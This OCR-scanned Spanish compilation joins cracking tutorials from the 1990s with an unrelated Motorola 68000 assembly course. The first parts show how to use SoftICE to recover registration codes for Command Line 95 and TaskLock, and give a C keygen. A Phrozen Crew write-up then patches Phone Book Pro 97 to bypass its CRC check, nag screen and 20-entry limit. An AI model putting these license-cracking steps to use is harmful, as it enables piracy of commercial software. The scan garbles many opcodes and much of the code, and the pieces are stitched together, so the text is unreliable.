Y ahora...Para ver que hay detras de EBP+9C haz esto 
:d ebp-9c 


La VD mostrara una larga fila de numeros - el codigo! Pero recuerda 
¿que dije antes?... 2 tipos de registro dan 2 codigos, asi que despues 
de que hayas escrito el codigo, continuaremos trazando con F10. 
Vayamos a esta parte del codigo 


> LEA  EAX, [EBP-68] ; EAX = EBP-68 
LEA  ECX, [EBP-34] ; ECX = EBP-34 
PUSH EAX ; Salvar: EAX 
PUSH ECX ; Salvar: ECX 

> CALL  00403DDO ; Llama a la funcion de nuevo 
ADD ESP, 08 ; Borra info salvada 
TEST EAX,EAX ; Verifica el regreso de la funcion 
JINZ  00402BFF ; Salta si noes 0 


Y que puedes encontrar en la direccion EBP-68? Bien... otro codigo de registro 
:d ebp-68 


ESo es todo... Espero que lo hayas entendido! 


3.2 Command Line 95 - Codigo de registro facil, y keymaker 


Es un programa agradable, con un codigo de registro muy facil 


3.1.1 Examinando el programa 


Examina el programa y te daras cuenta de que es una aplicacion de 32-bits 
que pide el nombre y codigo en una caja de registro 
Comencemos! 


3.1.2 Atrapar la rutina del codigo 


Como hemos hecho con el TaskLock - pondremos. 
Podemos ponerlo en el inicio de las funciones GetWindowTextA y GetDlgltemTextA. 
Ctrl+D para ir al SoftICE, y pon 

:bpx getwindowtexta 

:bpx getdlgitemtexta 


Ahora ve al dialogo de registro, y mete cualquier nombre y codigo 
Yo puse esto y acepte: 


Name: ED!SON '96 
Code: 12345 


El programa para en GetDlgltemTextA. como con TaskLock, presionamos F11 
para regresar a la llamada a la funcion. Nos desplazamos arriba con Ctrl+Up 
y veremos esto: 

MOV  ESI, [ESP+0C] 


PUSH 1E ; Longitud maxima 
PUSH  0040A680 ; Direccion del bufer 
PUSH  000003ED ; Manipula el control 
PUSH ESI ; Maneja los dialgos 


CALL  [User32!GetDlgltemTextA] 


El numero 40A680 parece interesante, veamos que hay en el: 
:d 404680 


Y lo que se muestra es si no se han entrado el nombre de la ventana de datos, 
Busquemos debajo y veremos esto 


PUSH 00 ; (no interesante) 

PUSH 00 ; (no interesante) 

PUSH  000003F6 ; Manejo del control 

MOV EDI, 0040A680 ; Salva la direccion del buffer 
PUSH ESI ; Manipula los dialogos 


CALL - [User32!GetDlgltemInt] 


GetDlgltemInt es parecido a GetDlgltemText, pero regresara un entero 
del texto de la ventana. Es introducido en EAX, Pasemos a traves de las instrucciones 
Vemos esto 

EAX=00003039 


Y que es 3039 en hex? pon: 
¿23039 


Obtendras esto: 
00003039 0000012345 "09" 
Ahex  *dec A ascil 


, como ves (y has comprobado), muestra el codigo que has escrito. Ok, ahora 
que?. Vamos a ver el siguiente codigo 

MOV  [0040A548], EAX ; Salva el codigo de regreso 

MOV - EDX,EAX ; Pone el codigo regresado en DX tambien 


3.1.3 Calculando el codigo 


Despues el codigo es calculado! 
MOV  ECX, FFFFFFFF ; Esta fila calcula la longitud del codigo 


SUB  EAX, EAX 


REPNZ SCASB e 


NOT  ECX e 

DEC. ECX ; ECX ahora contiene la longitud 

MOVSX EAX, BYTE PTR [00404680] ; Obtiene el byte de 40A680 
IMUL ECX,EAX y ECX = ECX * EAX 

SHL  ECX,0A ; Convierte ECX a OA 

ADD  ECX, 0002F8CC ; Suma 2f8cc al resultado 


MOV [00404664], ECX 


Y lo da como valido aqui 
CMP— ECX, EDX ; Compara los codigos 
JZ  00402DA6 ; s1es igual salta 


Cuando hayas trazado hasta la comparacion de codigos, puedes ver cual deberia 
haber sido tu codigo asi 
280% 


A mi me da esto 
0O0ODCOCC 0000901324 


Lo que quiere decir que el codigo bueno es 901324, 


Presiona ES o Ctrl+D para ir al programa, y correlo de nuevo, mete el codigo 
correcto en formato decimal y estara Registrado! 


4, HACIENDO UN KEYMAKER PARA EL COMMAND LINE 95 


Busca donde se calcula el codigo, y lo vamos a trasladar al lenguaje C. Hacer 
esto es muy facil: 
Codigo= ( (Uppercase_first_char * length_of_string) << Ox0A) + Ox2f8cc; 
*el primer caracter en mayuscula * longitud de la cadena* +0x2f8cc 


Nota (1): No olvides que todos los caracteres son convertidos a mayusculas 
cuando los metes en una ventana de texto, por lo tanto haremos lo mismo. 


Nota (2): "<< Ox0A" significa "multiplicar con 2410" 
Un posible programa en c podria ser este: 


ftinclude <string.h> 
ttinclude <stdio.h> 


int main() 


unsigned long code; 
unsigned char buffer[Ox1e]; 


printf("CommandLine95 Keymaker by ED!SON '961n”); 
printf("Enter name: ”); 
gets(buffer); 


strupr(buffer); 

code = ( ((unsigned long)buffer[0] * 
(unsigned long)strlen(buffer)) 
<< Ox0A) + 0Ox2f8cc; 


printf(" Y our code is: %lu", code); 
return 0; 


) 


Enjoy! 


4. HOW PUSH AND CALL AND THINGS REALLY WORK WHEN THE PROGRAM CALL A FUNCTION 


Mira este trozo del codigo de TaskLock de nuevo> 


PUSH 32 ; Salva: la maxima long. de la cadena 

PUSH EAX ; Salva la direccion del buffer del texto 

PUSH 000003F4 ; Salva Identificador de control 

PUSH DWORD PTR [ESI+1C] ; Salva Manejo de las cajas de dialogo 


CALL  [USER32!GetDlgltemTextA] ; Obtiene el texto 
Si llamas a esto desde un programa en c podrias ver: 


GetDlgltemTextA(hwndDlg, 0x3F4, buffer, 0x32); 
A[ESI+1C]  “EAX 


PUSH almacena datos cuando algo llama la pila. 
Esto significa que en cada PUSH se pone un nuevo dato/s en el principio 
de la pila y la funcion luego verificara que es correcto 


5. SOBRE PROGRAMAS EN VISUAL BASIC 


Los archivos de Visual Basic .EXE no son verdaderos EXES compilados 
simplemente contienen llamadas a VBRUNxxx.DLL, que lee datos desde el EXE 
para correr el programa, esto es tambien la razon por lo que los programas 

en Visual Basic son tan lentos. Y debido a esto no puedes desensamblar 

el ejecutable., encuentra las llamadas a la DLL, hay mucha basura, y cuando 

tu usas un debugger acanbas al final en la DLL 

La solucion a esto es un descompliador.Los hay para Visual Basic 2 y 3, 

hechos por un tal DoDi. Son shareware y los puedes encontrar en la red (Apendice c) 
Para las aplicaciones hechas en vb4 todavia no hay descompilador 

Note: No es cierto que sean programas hechos en Basic. 


A. HACIENDO SOFTICE LOAD SYMBOLS 


Para verificar que SoftICE ha cargado los simbolos de GetWindowText, entra en 
SoftICE y escribe esto: 


:exp getwindowtext 


Si no obtienes todas las funciones llamadas a GetWindowText listadas, 
necesitas editar SIW9ISYWINICE.DAT y quitar el caracter (';') que hay delante 
de algunos exp. necesitaras reiniciar para que funcione. Nota (Hay ciertos 
tutoriales acerca de como el Softlce en espa;ol en que te lo explican 

bastante bien tanto la configuracion como los breakpoints 


B. Sintaxis de las funciones 


Siempre es mas facil entender las funciones cuando las declaras 


int GetWindowText(int windowhandle, char *buffer, int maxlen); 
int GetDlgltemText(int dialoghandle, int controlid, char *buffer, int maxlen); 
int GetDlgltemInt(int dialoghandle, int controlid, int *flag, int type); 


Busca informacion en algun libro de referencia a la programacion 
bajo win/win32 


C. DONDE OBTENER EL SOFTWARE 


HERRAMIENTAS CRACKING 


SoftICE/Win 2.00: http://www.geocities.com/SoHo/2680/cracking.html 
VB Decompiler: — ftp://ftp.sn.no/user/balchen/vb/decompiler/ 


PROGRAMAS DE EJEMPLO 
TaskLock: http://users.aol.com/Sajernigan/sgllck30.zip 


CommandLine 95:  ftp://ftp.winsite.com/pub/pc/win95/miscutil/cline95.zip 


D. CONTACTA CONMIGO 


En IRC (EFNet): In 4+Ucf2000, FCracking 
By e-mail: edison Occnux.utm.my 
On my homepage: http://www.geocities.com/SoHo/2680/cracking.html 


Phone Book Pro 97 v2.31.0 


por 
Silicon Surfer 
Phrozen Crew 
(08 September 1997) 


Objetivo: Phone Book Pro 97 v2.31.0 build 482 
URL: http://www.idyle.com/pbpro97/download/pbpro97.zip 
Razon: encontre una peticion el 09/04/97 para crackearlo 


Herramientas: Hex Workshop v2.53 
W32Dasm v8.9 


OK, La primero de todo es obtener una lista de las Cadenas (String Data Reference) 
y leerlas. Encontre algunas referencias interesantes en: 


" PLEASE REGISTER. Read "Register.txt"" ; NAG 
"42F6171D60EF25F30105090B066BA$8" ; Codigo posible? 
"43EF2E2A67E144D42BE83FCA45" a 


"6C87868FB19963B270AF69B954DE" Bn 
"72878A97155AC14CD84CC055" En 


"Application has a CRC error!” >; Hmm... verificacion de CRC 
"Application ID block not found!" iS 

"Can not have more than " >; 

"CREW" ; Oh, referencias a PC97! 
"MAD MAX!" o 

"MADMAX!"" OS 

"PHROZEN" e 

"Please register your phone book " ¡ NAG 
"Registration code:" ; No hace falta explicarlo 
"RegistrationCode" AN 

"SALTINE" ; Mas PC97 

"Sex" ; Tal y como el mundo! 


"The Application CRC is not calculated "  ; Malos resultados en CRC 


"This is an unregistered version, " >; Venimos directos desde la nag 
"Unregistered Version” ¡ NAG 

"Unregistered" Sn 

"USER NAME" ; Lo dice todo el mismo. 
"Username" OS 


Vamos a ver que tenemos que hacer 
La primera cosa que advierto: 


1) Esta maldita cosa es muy lenta para empezar! Esto es por el chequeo de CRC 
Quizas deberiamos acelerar esto un poco, pero lo haremos despues. 


2) La primera linea de las cadenas anteriores muestra la apertura de esta NAG 


3) Register.txt dice: 


The registered version will remove the limit of 20 entries 
as well as the nag screen which we all dislike! So, if you 
use it, register it! 


Por lo tanto solo se nos permiten 20 entradas 
4) Cambiamos la fecha del sistema a 2010 y el programa todavia funciona 


Tareas, cualquier password y CRC, o crackear CRC y la Nag Screen y las 
20 entradas 


Vamos a comenzar con el chequeo CRC.. No puedes aplicar ningun parche 
si el CRC falla! Aqui esta el codigo que hace referencia a esto 
"Application has a CRC error!”. 


* Referenced by a CALL at Address: 


100456884 

:00456C14 53 push ebx 

:00456C15 56 push esi 

:00456C16 8BFO mov esi, eax 

:00456C18 C70580674D0000800000 mov dword ptr [004D6780], 00008000 
:00456C22 8BC6 mov eax, esi 

:00456C24 ES5BFEFFFF call 00456B84 <-- llama a la verificacion de bloques 
:00456C29 8BD8 mov ebx, eax 

:00456C2B 83FBFF cmp ebx, FFEFFFFEF 

:00456C2E 751E jne 00456C4E <-- Bloque encontrado 

:00456C30 C70580674D00DA7F0000 mov dword ptr [004D6780], 0O007FDA 
:00456C3A 8BC6 mov eax, esi 

:00456C3C E843FFFFFF call 00456B84 <-- Llama a la verificacion 
:00456C41 40 inc eax <-- Bloque encontrado 

:00456C42 750A jne 00456C4E <-- Bloque encontrado 

:00456C44 B8946C4500 mov eax, 00456C94 

:00456C49 E84AB9FEFF call 00442598 


* Jump from Addresses:00456C2E(C), :00456C42(C) 
| 


:00456C4E 83FBFE cmp ebx, FFFFFFFE — <-- comprueba el CRC? 
:00456C51 750A jne 00456C5D <-- Quizas, si es asi, esta equivocado! 
:00456C53 B8BC6C4500 mov eax, 00456CBC 

:00456C58 E83BB9FEFF call 00442598 


* Jump from Address:00456C51(C) 


:00456C5D 83FBFD cmp ebx, FFFFFFFD — <-- lo hemos hecho? 
:00456C60 7516 jne 00456C78 <-- si es 1gual no! 


:00456C62 B8046D4300 mov eax, 00456D04 


:00456C67 ES2CB9FEFF call 00442598 


:00456C6C A1E84F4D00 mov eax, dword ptr [004D4FE8] 
:00456C71 8B00 mov eax, dword ptr [eax] 
:00456C73 E8SF4BEFDFF call 00432B6C 


* Jump from Address:00456C60(C) 


:00456C78 4B dec ebx 
:00456C79 740C je 00456C87 
:00456C7B A1E84F4D00 mov eax, dword ptr [004D4FE8] 


:00456C80 8B00 mov eax, dword ptr [eax] 
:00456C82 ESESBEFDFF call 00432B6C 


* Jump from Address:00456C79(C) 


:00456C87 5E pop esi 
:00456C88 5B pop ebx 
:00456C89 C3 ret <-- OK, 


Esta bien, despues de todo esto un simple RETurn a la llamada (Call) lo pasaria. 
¿Que tipo de verificacion de CRC es esta...? 

Si cambiamos el 53", por un 'C3", al principio de la rutina pasaremos el 

chequeo del CRC. Esto ya esta, ahora la NAG 


:004BB9B8 8BD3 mov edx, ebx 

:004BB9BA ESFDA4FDFF call 00495EBC 

:004BBO9BF 84C0 test al, al 

:004BB9C1 0F84C7000000 je VO4BBASE <-- Vamos al mal chico!! 
:004BB9C7 33D2 xor edx, edx 

:004BB9C9 8B83C8050000 mov eax, dword ptr [ebx+05C8] 
:004BB9CF E824E6F6FF call 00429FES8 <flag de registrado en eax! 


:004BB9D4 80BE900C000000 cmp byte ptr [esi+00000C90], 00 
:004BB9DB 0F8444010000 je 004BBB25 
:004BB9E1 8B0DE84F4D00 mov ecx, dword ptr [004D4FE8] 


:004BB9E7 8B09 mov ecx, dword ptr [ecx] 

:004BB9E09 B201 mov dl, 01 

:004BB9EB A1508F4700 mov eax, dword ptr [00478F50] 
:004BB9F0 E82B21F7FF call 0042DB20 

:004BB9F5 8B 15B84E4D00 mov edx, dword ptr [004D4EB8] 
:004BB9FB 8902 mov dword ptr [edx], eax * Cadena de datos 
:004BB9FD 6844BF4B00 push 004BBF44 

:004BBA02 8D4DF4 lea ecx, dword ptr [ebp-0C] 
:004BBAOS A1D84E4D00 mov eax, dword ptr [004D4ED8] 
:004BBADOA 8B00 mov eax, dword ptr [eax] 

:004BBAOC 8BD3 mov edx, ebx 

:004BBAOE E8659FFDFF call 00495978 

:004BBA 13 FF75F4 push [ebp-0C] 


* Jump from Address:004BB9C1(C) <<--- Verifica esta llamada! 


:004BBAS8E 8B0DE84F4D00 mov ecx, dword ptr [004D4FE8] 


:004BBA94 8B09 mov ecx, dword ptr [ecx] 

:004BBA96 B201 mov dl, 01 

:004BBA98 A1508F4700 mov eax, dword ptr [00478F50] 
:004BBA9D E87E20F7FF call 0042DB20 

:004BBAA2 8B15B84E4D00 mov edx, dword ptr [004D4EB8] 
:004BBAAS 8902 mov dword ptr [edx], eax 

:004BBAAA A1B84E4D00 mov eax, dword ptr [004D4EB8] 
:004BBAAF 8B00 mov eax, dword ptr [eax] 

:004BBAB1 8B380DC010000 mov eax, dword ptr [eax+000001DC] 
:004BBAB7 BA9F400000 mov edx, 0000409F 

:004BBABC E88335F8FF call 0043F044 

:004BBACI A1B84E4D00 mov eax, dword ptr [004D4EB8] 
:004BBAC6 8B00 mov eax, dword ptr [eax] 

:004BBACS8 8B380DC010000 mov eax, dword ptr [eax+000001DC] 
:004BBACE 8B5024 mov edx, dword ptr [eax+24] 
:004BBAD1 DIEA shr edx, 1 

:004BBAD3 8B0DB384E4D00 mov ecx, dword ptr [004D4EB8] 
:004BBADO9 E86635F8SFF call 0043F044 

:004BBADE A1B84E4D00 mov eax, dword ptr [004D4EB8] 
:004BBAE3 8B00 mov eax, dword ptr [eax] 

:004BBAES 8B80E0010000 mov eax, dword ptr [eax+000001E0] 


* StringData Ref from Code Obj ->"This is an unregistered version," 
->"please consult "REGISTER.TXT" " 
->"for more details." 

:004BBAEB BAA4BF4B00 mov edx, 0O4BBFA4 


una simple rutina verifica si es correcto, si no lo es va a la Nag, sino 
a registrado, 


Cambiemos 

:004BB9C1 0F84C7000000 je 0O4BBASE 
a 

:004BB9C1 0F85C7000000 jne 0O4BBASE 


La nag se ha ido!!! Pero espera, si seguimos, estamos Completamente registrados 
No mas pantallas de como registrarlo y se evita el limite de 20 entradas, 
pero en la pantalla de About aparece UNREGISTERED 


Sin embargo, no estamos contentos del todo... 
Coge un editor Hex y cambia el Unregistered, por lo que quieras 
Yo lo he hecho por Phrozen Crew. 


Crack hecho! 
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Introducción al lenguaje Ensamblador del Microprocesador 
Motorola 68000 


El Lenguaje Ensamblador del Motorola 68000, es la Unidad Didáctica III, de la asignatura Estructura y 
Tecnología de Computadores I, que se cursa en la Ingeniería Técnica de Informática de Sistemas en la 
UNED. El propósito de esta página es ser una primera referencia para poder empezar a comprender que es 
un lenguaje y un programa ensamblador, y como se programa en bajo nivel.Esta página la empecé a 
construir en el verano de 1997, mientras estudiaba la carrera, y me ayudó a comprender la materia a la vez 
que me hizo distraerme, aprendiendo a diseñar webs. Os ruego no me pidaís ayuda pues no soy ningún 
entendido en ensamblador ni lo he vuelto a tocar desde entonces. 


El lenguaje ensamblador surge con la idea de evitar las dificultades que presenta el trabajar en lenguaje 
máquina, siendo la misión de este la de simplificar la programación en un computador y teniendo a la vez un 


control directo sobre el hardware del mismo. 


El lenguaje ensamblador es un lenguaje cuyas estructuras de datos se corresponden con las estructuras 
físicas de los registros de la memoria principal del computador para el que está pensado, y cuyas 
instrucciones tienen una relación directa y biunívoca con las instrucciones del lenguaje máquina. 
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programa ensamblador 


Un programa ensamblador es un programa que traduce un texto escrito en lenguaje ensamblador de un 
determinado computador al lenguaje máquina de ese mismo computador, y proporciona las facilidades 
necesarias para simplificar la tarea de desarrollar programas en lenguajes de bajo nivel. 


También, un programa ensamblador proporciona una interfaz adecuada entre el programador y la 
arquitectura del computador, para las tareas de programación. Si el ordenador que se utiliza para esta tarea 
es el mismo, o tiene la misma CPU, que el sistema que va a ejecutar el código máquina resultante de la 
traducción, se dice que el programa ensamblador utilizado es un auto-ensamblador o ensamblador residente, 
mientras que si utiliza otra CPU diferente es un ensamblador cruzado (cross assembler). 


El ordenador sobre el que corre el programa ensamblador tendrá en su memoria central el programa 
fuente codificado en caracteres alfanuméricos y el propio programa ensamblador que se está ejecutando, 
debiendo reservar en memoria, además, un espacio para ir almacenando el código resultante de la 
traducción. El programa fuente se encuentra almacenado en una zona de memoria, llamada buffer, en forma 
de caracteres alfanuméricos, ocupando cada carácter un byte. El código resultante del proceso se denomina 
código objeto, y queda almacenado en otro lugar de la memoria. Además se utiliza otra zona de memoria 
destinada a almacenar la tala de símbolos. La tabla de símbolos no es sin un pequeño diccionario que 
construye el programa ensamblador en el que constan todas las etiquetas utilizadas junto con sus 
equivalencias numéricas. La tabla de símbolos es temporal y sirve al propio programa ensamblador a la hora 
de efectuar la traducción. Una vez ensamblado el programa, la tabla no tiene otra utilidad que la de su 
posible consulta por parte del programador durante el proceso de depuración. El programa ensamblador 
actúa generalmente en dos pasos: durante el primero lee el código fuente y anota en la tabla de símbolos las 
etiquetas que se encuentran, calculando, si es necesario su equivalencia; en el segundo paso se apoya en la 
tabla de símbolos y, mediante otra lectura del programa fuente, va traduciendo, instrucción por instrucción, 
los códigos nemónicos que encuentra. eneralmente, los programas ensambladores están dotados de la 
posibilidad de detectar errores y dan el aviso correspondiente cuando encuentran un nemónico inexistente, 
un operando fuera de margen, una etiqueta definida dos veces, etc. 
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Estructura y sintaxis de un lenguaje ensamblador 


La Sintaxis de un lenguaje ensamblador es el conjunto de reglas que debe guardar el programa fuente y que 
estará compuesto por una serie de instrucciones, distinguiéndose cuatro campos: etiqueta, mnemotécnico, 
operando y comentario. El programa fuente deberá estar en un fichero ASCHU que se genera con la ayuda de 
un programa editor, y no un procesador de textos, ya que estos generan códigos de control que los 
ensambladores son incapaces de interpretar. Un sencillo editor es el de MS-DOS. Las instrucciones en 
código máquina se codifican por campos, por lo que las instrucciones escritas en ensamblador se codificaran 
también por campos. 


LINEA DE INSTRUCCION EN ENSAMBLADOR 


| ETIQUETA NEMOTECNICO | OPERANDO COMENTARIO 
| SUBR MOVE.L | DO, - (SP) ; Guarda DO 


a) Campo de Etiqueta: 


Es un campo opcional que se utiliza para tener una referencia de las instrucciones. El programa 
ensamblador va traduciendo secuencialmente las instrucciones del programa fuente, guardando los códigos 
traducidos en posiciones consecutivas de memoria. Cuando encuentra una etiqueta en una línea de 
instrucción, el ensamblador guarda dicha etiqueta en una tabla especial en la memoria, junto con la dirección 
de memoria en la que se ha almacenado la instrucción que la acompaña, así si alguna instrucción tiene que 
referenciar a la instrucción etiquetada, bastará con que se escriban los caracteres de la etiqueta en el campo 
de operandos correspondiente. El programa ensamblador se encargará, cuando deba traducir esta 
instrucción, de buscar en la tabla la dirección en memoria de la instrucción correspondiente a la etiqueta. 


Las ventajas del empleo de etiquetas son: 
e Las etiquetas permiten localizar y recordar fácilmente una determinada instrucción. 
+ Se puede modificar de forma sencilla, en la fase de corrección de un programa, el punto hacia 
donde tienen que realizarse uno o más saltos, simplemente cambiando la etiqueta de una instrucción 
a otra. 
e  Encaso de que el programa objeto se deba colocar en posiciones de memoria diferentes de las 
que en un principio se habían previsto, si se han asignado etiquetas, no hay que hacer ningún cambio 
en el programa fuente pues al hacer la nueva traducción, el programa ensamblador asigna 
automáticamente las nuevas posiciones a las etiquetas. Así facilita la unión de varios programas que 
hayan sido desarrollados por separado. 


e El programador se libera de la tarea de calcular direcciones. 


Todos los ensambladores imponen algunas reglas y limitaciones en la utilización de etiquetas, siendo estas 
en el caso del Asm68k las siguientes: 


e Unicamente son significativos los primeros quince caracteres de la etiqueta 


e Los caracteres pueden ser cualquier código ASCH mayor que 32 (espacio), salvo +-/£!<() 


e El primer carácter no puede ser un número, ni los símbolos $ y % 
Mayúsculas y minúsculas se consideran caracteres diferentes. 


b) Campo de Nemotécnico: 


Se utiliza para escribir los códigos de instrucciones ejecutables y los códigos de pseudoinstrucciones o 
directivos de ensamblador. 


Las instrucciones ejecutables son los mnemotécnicos que constituyen las instrucciones del computador. 


Las pseudoinstrucciones sirven para dar al ensamblador indicaciones como la dirección de memoria a partir 
de la cual debe ir guardando los códigos traducidos, realizar la reserva de las posiciones de memoria donde 
deben guardarse los resultados, etc. Las pseudoinstrucciones reciben este nombre porque sus 
mnemotécnicos no se convierten en código máquina, sino que son ejecutados directamente por el programa 
traductor. 


c) Campo de Operandos: 


Se utiliza para indicar los valores concretos de los operandos que intervienen en la operación definida por el 
campo mnemotécnico. Dependiendo de la instrucción indicada en el campo mnemotécnico, habrá que 
definir el modo de direccionamiento, que estará determinado generalmente, mediante una combinación del 
código de operación y la información del campo de operandos. 


1. Números y constantes alfabéticas. 
Las cantidades colocadas en el campo de operandos pueden venir expresadas en diferentes bases de 


numeración, que son: binaria, decimal y hexadecimal, y van determinados por un símbolo que se añade al 
valor numérico. 


DECIMAL por defecto 


BINARIO % 


HEXADECIMAL $ 


2. Símbolos. 
El conjunto de caracteres alfanuméricos que se utiliza en el campo de los operandos para indicar una 
dirección recibe el nombre de símbolo. El programador podrá definir sus propios símbolos mediante dos 


procedimientos: 


a) De forma implícita, mediante el empleo de etiquetas. 


b) De forma explícita, mediante algunas pseudoinstrucciones. 
3. Expresiones. 


Una expresión es una combinación de números y/o símbolos unidos mediante operadores aritméticos o lógicos 


d) Campo de Comentarios: 


Mediante el campo de comentarios se trata de hacer más comprensivo al programa, incluyendo el todos los puntos 
claves, definición de símbolos, reservas de memoria, propósito del programa, etc. 
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Directivas de ensamblador o pseudoinstrucciones 


Las pseudoinstrucciones dan al ensamblador indicaciones como la dirección de memoria a partir de la cual debe ir 
colocando los códigos traducidos, realizar la reserva de las posiciones de memoria donde deben guardarse los 
resultados, etc. Se utiliza el campo nemotécnico para transmitir esta información al programa traductor y darle las 
indicaciones necesarias para que éste pueda realizar la traducción correctamente. Por lo que debe reservarse un 
conjunto de mnemotécnicos para este fin los cuales no se convierten en código máquina, sino que son ejecutados 


directamente por el programa traductor. 


DIRECTIVO DESCRIPCION 
etiq EQU expr  ¡Asigna el valor de la expresión expr a la etiqueta etiq. 


ORG E Las instrucciones que van después empezarán en la 
dirección n de memoria. 
etig Inicializa el operando de tamaño S al valor n, 
etiq 
Indica al ensamblador que la dirección simbólica etig 
puede ser utilizada por otros módulos. 


Acción condicional; si se verifica la condición cona, el 

ensamblador traduce las instrucciones comprendidas 
ELSE cond [entre el IF y el ELSE, si no se verifica, traduce las 

instrucciones comprendidas entre el ELSE y el 
ENDIF ENDIF. 


guardándolo en la dirección simbólica etiq. 


Reserva espacio en memoria para n operandos, de 
n amaño S cada uno, y el primer operando se 


almacena en la dirección simbólica etiq. 


Es obligatorio y debe ser la última sentencia del 
programa. 


Indica al ensamblador que la dirección simbólica etig 
está definida en otro módulo. 


NAME a El nombre nom aparecerá en la cabecera de cada 
página de listado. 
LIST Indica al ensamblador que debe imprimir el programa 
fuente. 
TABLE a al ensamblador que debe imprimir la tabla de 
símbolos. 
Indica al ensamblador que debe imprimir el programa 
LALL En Ñ E 
fuente, el código máquina y la tabla de símbolos. 
EVEN Almacena la siguiente instrucción o asignación de 
memoria en una dirección par. 


1.- DEFINICIÓN DE SÍMBOLOS (EQU) 


Definir un símbolo consiste en asignar un valor como un número o una dirección de memoria a un nombre 
utilizando el directivo EQU. 


Ejemplo: IMPRESORA EQU $AB12 


Cuando el traductor lee este directivo, guarda la etiqueta y el valor indicado en el operando, en una zona de 
memoria denominada tabla de símbolos. Al encontrar un símbolo en el campo de operandos el traductor consultará 
esta tabla para ver el valor que le corresponde. 


2.- EL CONTADOR DE DIRECCIÓN DE ENSAMBLADO (ORG) 


El programa ensamblador utiliza un registro que le indica en que posición de memoria debe guardar una 
instrucción y que dirección debe asignar a una determinada etiqueta. Este registro se llama contador de dirección de 
ensamblado. Para poner el contenido de este contador a un valor determinado se usa una pseudoinstrucción 
denominada ORG. 


Ejemplo: $1500 pone el número $1500 en el contador de dirección de ensamblado. 


ORG 


3.- DEFINICIÓN DE CONSTANTES (DC) 


La sentencia DC.S permite definir una posición de memoria conteniendo un valor determinado o una serie de 
valores que se colocarán en orden a partir de la posición señalada. 


4.- DEFINICIÓN DE DATOS (DS) 


La sentencia DS,S reserva espacio de memoria sin especificar su contenido , y su longitud viene dada por el valor 
del operando , viéndose afectado este por el tamaño de la palabra como un factor multiplicador siendo por 1, por 2 o 
por 4 respectivamente. 


5.- ULTIMA SENTENCIA DEL PROGRAMA (END) 


La sintaxis de este directivo es muy simple ya que consta sólo de un campo de mnemotécnico, END. Este directivo 
únicamente se usa una vez en cada programa y será necesariamente la última instrucción. 


6.- ENLACE ENTRE PROGRAMAS (EXT, DEF) 


La programación modular consiste en dividir un programa complejo en módulos independientes de manera que 
cada uno de ellos realice una tarea concreta. Para permitir la traducción de dichos módulos se usa el directivo EXT 
que indica al ensamblador que los símbolos utilizados en el módulo objeto de la traducción están definidos en otro 
módulo diferente. 

En el módulo donde se definen los símbolos que pueden ser utilizados por otros módulos deberá indicarse con el 
directivo DEF. 


7.- ACCIONES CONDICIONALES (IF, ELSE, ENDIF) 


Estas pseudoinstrucciones funcionan como en un lenguaje de alto nivel, es decir si se verifica la condición, el 
ensamblador traduce las instrucciones entre el IF y el ELSE y sino, entre el ELSE y el ENDIF. 


8.- EJECUCIÓN DE INFORMES (NAME, PAGE, LIST, TABLE, LALL) 


El programa ensamblador puede emitir una serie de informes, como mostrar un listado en lenguaje ensamblador y 
en código máquina, mostrar los errores sintácticos, etc. Los directivos que realizan estas funciones son los 
siguientes: 

- NAME: da la posibilidad de poner un identificador al programa, así cuando se liste aparecerá el nombre en la 
cabecera. 

- PAGE: indica al traductor que debe de saltar a una nueva página cuando esté imprimiendo el informe. 

- LIST: indica al traductor que imprima el programa fuente. 

- TABLE: indica al traductor que imprima la tabla de símbolos 

- LALL: indica al traductor que imprima el programa fuente, el código máquina y la tabla de símbolos. 


9.- ALMACENAMIENTO EN POSICIÓN PAR 


Existe una pseudoinstrucción, EVEN, que soluciona el problema de los microprocesadores de 16 bits, ya que 
estos sólo pueden utilizar datos de 2 bytes o más, comenzando siempre desde una posición par. 


Capitulo 5 


Programación de un Microprocesador de 16 bits el 68000 de 
Motorola 


A continuación se irán describiendo los tres componentes principales del computador, la memoria, el procesador y 
la unidad de entrada/salida, según el esquema adjunto. 


Memoria Procesador | 


Registros de Registros de Registros 
datos direcciones de control 


" Puertos de entrada/salida 


| 


INDICE 


1.- La Memoria 


2.- Registros de Datos 


3.- Modos de Direccionamiento 


4.- Formatos de instrucciones 


5.- Instrucciones condicionales 
6.- Entrada/Salida 
7.- Gestión de Subrutinas 


1.- La Memoria 


La memoria principal de este computador está formada por celdas de un byte (8 bits), que constituyen la unidad 
básica de lectura o escritura, identificándose mediante una dirección. 
Los procesos de lectura y escritura pueden realizarse con varias celdas consecutivas simultáneamente, debiendo 
indicar el procesador a la memoria principal dos parámetros, la dirección de la primera celda de memoria y la longitud 


de la información a la que se desea acceder. Siendo esta longitud de un byte, dos bytes (una palabra) o cuatro bytes 
(palabra larga). 
El tamaño máximo de la memoria viene determinado por el número de bits de los registros de direcciones que tiene el 
procesador, siendo en el caso del Motorola 68000 de 32 bits pero, debido a limitaciones en el montaje solo pueden 
utilizarse 24 como máximo, así que la máxima longitud que se puede usar de la memoria principal es de 224 bytes, 
desde O hasta FFFFFF . 
El procesador puede leer y escribir información de diferentes tamaños, existiendo una norma para almacenar las 
palabras (W) y las palabras largas (L), y siendo esta la de comenzar por el byte más significativo. 

Existen 7 registros de direcciones y son: AO, A1, A2, A3, A4, A5 y A6, siendo estos de 32 bits aunque solo 
pudiendose utilizar 24 bits para direccionar como antes se ha mencionado. 


2.- Registros de Datos 


El Motorola 68000 consta de 8 registros de datos, que son DO, D1, D2, D3, D4, D5, D6 y D7. Cada uno consta de 
32 bits. En muchas instrucciones existe la posibilidad de especificar el tamaño del dato, indicándose este mediante el 
sufijo S (B, W y L), que va añadido al nemotécnico de la instrucción. 

La forma en que se almacenan los datos en los registros, viene dada por su longitud, ya que como esta es 
variable, irán ocupándolos de izquierda a derecha empezando por el bit menos significativo del registro. 


3.- Modos de Direccionamiento 


Existen cuatro modos de direccionamiento: 


1.- Direccionamiento inmediato: almacena el operando precedido del símbolo + en el registro indicado. 
Ejemplo: MOVE.L +4$18,D6 


2.- Direccionamiento absoluto: almacena el operando que está en la dirección de memoria especificada en el 
registro de datos indicado. 
Ejemplo: ADD.W %000000001000111110001,D2 suma la palabra que está en la dirección de memoria indicada, 


a D2. 


3.- Direccionamiento mediante registro: apunta a la dirección del registro donde está el dato. Ejemplo: MOVE. 
B D3,D4 copia el contenido del registro D3 (byte) a D4. 


4.- Direccionamiento relativo a registro: 


e a) Direccionamiento mediante registro normal: se da la dirección del registro donde está la dirección del 
dato. El nombre del registro se escribe entre paréntesis. 

